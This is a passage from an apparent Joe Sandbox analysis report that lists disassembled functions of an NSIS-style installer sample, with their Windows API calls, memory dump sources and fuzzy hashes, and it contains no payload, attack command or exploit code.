                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 587946157-0
                                                                                                                                                                                                                                  • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                                                                                                                                  • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                                                                                                                                                                  Function 00404353 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040412A), ref: 0040435D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                  • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                                                                  • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00404822 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404871
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040489B
                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040494C
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404957
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404989
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 00404995
                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
                                                                                                                                                                                                                                    • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
                                                                                                                                                                                                                                    • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                                                                                                                                                    • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                                                                                                                                                    • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                                                                                                                                                    • Part of subcall function 0040668A: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
                                                                                                                                                                                                                                    • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                                                                                                                                                    • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
                                                                                                                                                                                                                                    • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: : Completed$A
                                                                                                                                                                                                                                  • API String ID: 2624150263-4013017881
                                                                                                                                                                                                                                  • Opcode ID: f244a7a0bf5f50bfc64a75f8fb5ad8ad31c4b097fff63674a0d64c300928d872
                                                                                                                                                                                                                                  • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f244a7a0bf5f50bfc64a75f8fb5ad8ad31c4b097fff63674a0d64c300928d872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                                                                                                                                                                                  Function 00405AED Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B16
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B87
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B97
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                  • API String ID: 2035342205-3042786806
                                                                                                                                                                                                                                  • Opcode ID: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                                                                                                                                                  • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                                                                                                                                                                                  Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402261
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                  • API String ID: 542301482-455884830
                                                                                                                                                                                                                                  • Opcode ID: 1f6ecdd328272fbdb716ed457f1e8b08ad679cade6d4f58ae1881b77d0c7825b
                                                                                                                                                                                                                                  • Instruction ID: ffb8b13858b70c1ff9263f9ad1230fafd83ab24b06fb2866c5c71dc23dde5df7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f6ecdd328272fbdb716ed457f1e8b08ad679cade6d4f58ae1881b77d0c7825b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F411675A00209AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                                                                                                                                                                                  Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                                                                                                  • Opcode ID: 4454f35d9bb29c406d6468a9209f8faf96a626bd34478fe6e82ff10e093cc49a
                                                                                                                                                                                                                                  • Instruction ID: 8edab8899b0228974304dfa76bdc964f5a5729fff09c5fb89d7f9bd6055596d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4454f35d9bb29c406d6468a9209f8faf96a626bd34478fe6e82ff10e093cc49a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF05E71A041049AC700DFA4D9499AEB374EF10314F61457BE912F21E0D7B85E119B2A
                                                                                                                                                                                                                                  Function 00404D9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DB5
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DC2
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
                                                                                                                                                                                                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
                                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000110), ref: 00404E9F
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
                                                                                                                                                                                                                                    • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00405001
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051D5
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004051E5
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405307
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040538E
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405399
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004053A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                  • String ID: $M$N
                                                                                                                                                                                                                                  • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                  • Opcode ID: e65f9a1c394212a9998e8446e7bde38381c40a8c32278b0b704a2027b11c527a
                                                                                                                                                                                                                                  • Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e65f9a1c394212a9998e8446e7bde38381c40a8c32278b0b704a2027b11c527a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58
                                                                                                                                                                                                                                  Function 004044F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004045D0
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404673
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004046F2
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040470E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
